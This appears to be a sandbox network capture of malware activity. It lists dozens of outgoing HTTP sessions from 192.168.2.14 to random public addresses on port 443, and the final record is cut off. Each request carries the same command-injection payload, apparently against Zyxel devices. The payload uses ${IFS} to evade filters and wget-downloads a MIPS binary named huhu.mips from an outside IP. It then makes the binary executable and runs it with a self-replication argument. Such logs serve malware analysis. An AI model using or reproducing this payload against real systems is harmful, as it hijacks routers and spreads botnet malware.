                                                      Feb 2, 2024 06:35:46.485486031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2650192.168.2.145738446.248.64.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485507965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2651192.168.2.1458168181.205.84.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485546112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2652192.168.2.1453834159.210.43.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485586882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2653192.168.2.1442496222.39.104.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485635042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2654192.168.2.144433488.71.55.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485687971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2655192.168.2.1440584204.238.121.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485753059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2656192.168.2.1433782169.184.45.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485764980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2657192.168.2.1449274124.186.83.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485817909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2658192.168.2.143442683.92.229.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485872030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2659192.168.2.143724496.233.136.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485912085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2660192.168.2.1448538123.66.96.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485953093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2661192.168.2.145226845.53.58.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.485987902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2662192.168.2.1458412144.209.145.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486032009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2663192.168.2.1436612123.245.197.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486073971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2664192.168.2.145382276.44.180.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486202955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2665192.168.2.145125659.186.188.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486231089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2666192.168.2.1452478145.187.212.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486273050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2667192.168.2.1458206151.181.239.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486326933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2668192.168.2.1449478181.215.56.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486356020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2669192.168.2.1435224210.120.250.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486406088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2670192.168.2.144563219.159.143.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486440897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2671192.168.2.1451336122.201.239.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486460924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2672192.168.2.144259850.250.244.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486510992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2673192.168.2.144420493.44.153.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486540079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2674192.168.2.144130896.56.239.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486601114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2675192.168.2.1444686162.141.56.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486638069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2676192.168.2.1453698201.57.27.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486665964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2677192.168.2.1442152204.202.106.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486733913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2678192.168.2.1453354171.188.70.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486768007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2679192.168.2.1453774223.127.85.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486790895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2680192.168.2.1452130210.202.19.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486813068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2681192.168.2.1445586186.36.107.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486840010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2682192.168.2.143755877.220.171.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486888885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2683192.168.2.1436898167.99.201.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486915112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2684192.168.2.1455188220.102.63.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486943960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2685192.168.2.143347881.135.23.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486972094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2686192.168.2.143625482.204.5.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.486998081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2687192.168.2.1457528178.130.167.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487040043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2688192.168.2.143844258.12.34.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487066031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2689192.168.2.1451180204.176.89.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487143040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2690192.168.2.1456398143.180.211.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487163067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2691192.168.2.145357089.37.59.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487220049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2692192.168.2.145741659.23.40.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487281084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2693192.168.2.1452756210.30.210.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487310886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2694192.168.2.1445388130.174.155.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487338066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2695192.168.2.1445170170.116.255.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487377882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2696192.168.2.1459460195.195.104.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487423897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2697192.168.2.1445246177.108.11.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487453938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2698192.168.2.1442930169.38.5.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487495899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2699192.168.2.1438994202.162.75.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487549067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2700192.168.2.1454458185.251.204.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487596989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2701192.168.2.1443180203.221.124.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487627029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2702192.168.2.1443182142.106.93.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487680912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2703192.168.2.1433266208.205.76.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487724066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2704192.168.2.1460768192.90.122.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487771988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2705192.168.2.1443256179.6.226.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487786055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2706192.168.2.144868497.221.166.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487818956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2707192.168.2.145471099.221.8.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487865925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2708192.168.2.1453978146.217.146.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487910986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2709192.168.2.144690694.226.153.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.487951040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2710192.168.2.1448410107.54.67.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488010883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2711192.168.2.1451836169.190.71.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488039017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2712192.168.2.1451532186.120.122.37443
                                                      TimestampBytes transferredDirectionData
